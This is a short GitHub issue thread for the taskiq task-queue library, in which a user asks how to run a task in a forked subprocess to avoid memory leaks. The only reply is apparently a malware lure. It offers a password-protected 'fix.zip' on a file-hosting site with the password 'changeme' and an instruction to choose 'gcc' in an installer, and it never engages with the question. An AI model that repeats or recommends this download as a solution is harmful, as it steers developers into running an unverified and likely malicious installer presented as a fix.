### ISSUE TITLE
Kiq a task in a subprocess ?

### ISSUE THREAD

**Issue by realitix** [taskiq-python/taskiq#352]
Hello, 
I have a specific problem. I'm using a library that has memory leaks. Therefore, I am forced to fork to properly release the memory. Is it possible with Taskiq to launch a task by forking directly?

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
